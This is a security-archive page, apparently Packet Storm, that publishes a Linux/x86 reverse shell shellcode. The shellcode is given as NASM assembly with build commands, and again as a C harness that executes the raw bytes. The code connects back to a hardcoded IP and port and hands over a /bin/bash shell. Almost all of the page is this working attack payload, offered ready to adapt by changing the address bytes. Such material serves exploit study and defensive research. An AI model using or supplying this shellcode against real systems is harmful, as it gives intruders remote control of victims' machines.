exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 Reverse Shell Shellcode

Linux/x86 Reverse Shell Shellcode
Posted Mar 25, 2017
Authored by Jasmin Landry

110 bytes small Linux/x86 reverse /bin/bash shellcode.

tags | x86, shellcode, bash
systems | linux
SHA-256 | c877dbeb641d857b55e73f461a09ca14679ca4f290a989b9b455e4512cce7981

Linux/x86 Reverse Shell Shellcode

Change Mirror Download
/*
; File name: reversebash.nasm
; Author: Jasmin Landry (@JR0ch17)
; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119
; To change
; Shellcode length: 110 bytes
; Tested on Ubuntu 12.04.5 32-bit (x86)
; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g
; Link: ld -z execstack -o reversebash reversebash.o
; Use objdump to find shellcode and copy it over to the code section of the .c file
; Compile: gcc -m32 -fno-stack-protector -z execstack reversebash.c -o reversebash2

global _start

section .text
_start:
jmp short call_shellcode

shellcode:
xor eax, eax
xor ebx, ebx
xor ecx, ecx

pop edx

push 0x6
push 0x1
push 0x2

mov al, 0x66
mov bl, 0x1
mov ecx, esp
int 0x80

mov esi, eax

xor eax, eax
push eax
push dword [edx+2]
push word [edx]
push word 0x2
mov ecx, esp
push 0x10
push ecx
push esi
mov al, 0x66
mov bl, 0x3
mov ecx, esp
int 0x80

xor ecx, ecx
mov cl, 0x3

loop:
dec cl
mov al, 0x3f
mov ebx, esi
int 0x80

mov esi, eax
jnz loop

xor eax, eax
xor ecx, ecx
push ecx
push 0x68736162
push 0x2f6e6962
push 0x2f2f2f2f
mov ebx, esp
push ecx
push ebx
mov al, 0xb
mov ecx, esp
xor edx, edx
int 0x80

call_shellcode:
call shellcode
port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 ;First 2 bytes are port and last 4 are IP. Please change these bytes to reflect your environment and recompile.

*/


#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x61\x31\xc0\x31\xdb\x31\xc9\x5a\x6a\x06\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\xff\x72\x02\x66\xff\x32\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\x89\xf3\xcd\x80\x89\xc6\x75\xf4\x31\xc0\x31\xc9\x51\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x51\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80\xe8\x9a\xff\xff\xff\xd4\x31\xc0\xa8\x03\x77"; //Again, the last 4 bytes are the IP and the 2 before those are the port.

main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close